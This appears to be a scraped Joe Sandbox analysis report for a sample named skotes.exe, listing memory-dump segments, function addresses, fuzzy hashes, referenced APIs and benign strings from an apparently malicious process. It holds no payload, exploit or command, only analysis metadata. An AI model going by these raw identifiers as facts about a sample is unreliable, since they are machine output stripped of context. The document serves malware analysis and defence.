Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: ae653f2904145b69ab52663abb2b4fb7e3edd65935fe92c1210b3776c40d0dfd
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 67B145329402959FDB11DF28C8D17EEBBE5EF46340F1441AAF855EB241D6349E82EBA0

Function 00BE26B0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00BE2846
___std_exception_destroy.LIBVCRUNTIME ref: 00BE28E0

Strings

s|-I, xrefs: 00BE26D8

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy___std_exception_destroy
String ID: s|-I
API String ID: 2970364248-705684097
Opcode ID: c1ca72628c654d97724bfa1a59d4662d72901f5ceea004e0ea4ff440271a22c5
Instruction ID: 81b5f87bd3b450121210c367a269677bdb0e3bac2254b391bdc224702ad89866
Opcode Fuzzy Hash: c1ca72628c654d97724bfa1a59d4662d72901f5ceea004e0ea4ff440271a22c5
Instruction Fuzzy Hash: 1C716071E002489BDB04DFA8C881BEDFBF9EF59310F14415DE815A7285D774A984CBA5

Function 00BEDBE0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON

Download Yara Rule

Strings

s|-I, xrefs: 00BEDBE6, 00BEDD2F
list too long, xrefs: 00BEE09D

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: list too long$s|-I
API String ID: 0-3615790553
Opcode ID: 5f07bc49bf40d0284e5dde9f2ce67705fd588e9e9e0b8d4e77eb35386144736f
Instruction ID: 62b99f1016708818550699d35763e286a69df932321fe719d57c1594582f3fe1
Opcode Fuzzy Hash: 5f07bc49bf40d0284e5dde9f2ce67705fd588e9e9e0b8d4e77eb35386144736f
Instruction Fuzzy Hash: E76180B0D04658ABDB20DF64CD85BA9B7F4FF04700F1041E9E91DAB291EB71AA89CB51

Function 00BE2900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00BE29DF

Strings

s|-I, xrefs: 00BE2915
s|-I, xrefs: 00BE29C4

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: s|-I$s|-I
API String ID: 2659868963-1844435136
Opcode ID: 38769f8544229b35ce747ec0febdf81743671c15ad00ebd1d7c2479322e2648e
Instruction ID: df72a3c090946696b66b2c23f6af11821a13194c72420b1f4b381970a94d5a12
Opcode Fuzzy Hash: 38769f8544229b35ce747ec0febdf81743671c15ad00ebd1d7c2479322e2648e
Instruction Fuzzy Hash: D231C3B1910209AFCB14DF58C841B9EFBF9FF49720F54462AF814A7780E771A954CBA0

Function 00BE2B30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00BE2B63

Strings

This function cannot be called on a default constructed task, xrefs: 00BE2B43
s|-I, xrefs: 00BE2B36

Memory Dump Source

Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: This function cannot be called on a default constructed task$s|-I
API String ID: 2659868963-1262271033
Opcode ID: 30ca8385087494d60fe0d49e6bda9ef0c40c4e9b7a7dfe608a5a8bd637a52956
Instruction ID: 6dae521a1b3b58d9aa92af0ffb5518d8fef25a497fed42689e6ee20c78ad14e7
Opcode Fuzzy Hash: 30ca8385087494d60fe0d49e6bda9ef0c40c4e9b7a7dfe608a5a8bd637a52956
Instruction Fuzzy Hash: 4AF0A771D2030C9BC710DF68984159EFBF9EF16300F5442AEF84167340EB711A58CB95

Analysis Process: skotes.exePID: 2216, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.7%
Total number of Nodes:	118
Total number of Limit Nodes:	7

Executed Functions

Function 00C22517 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 374
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,00C36758), ref: 00C2275C

Strings

Eastern Summer Time, xrefs: 00C227FA
Eastern Standard Time, xrefs: 00C227CB

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
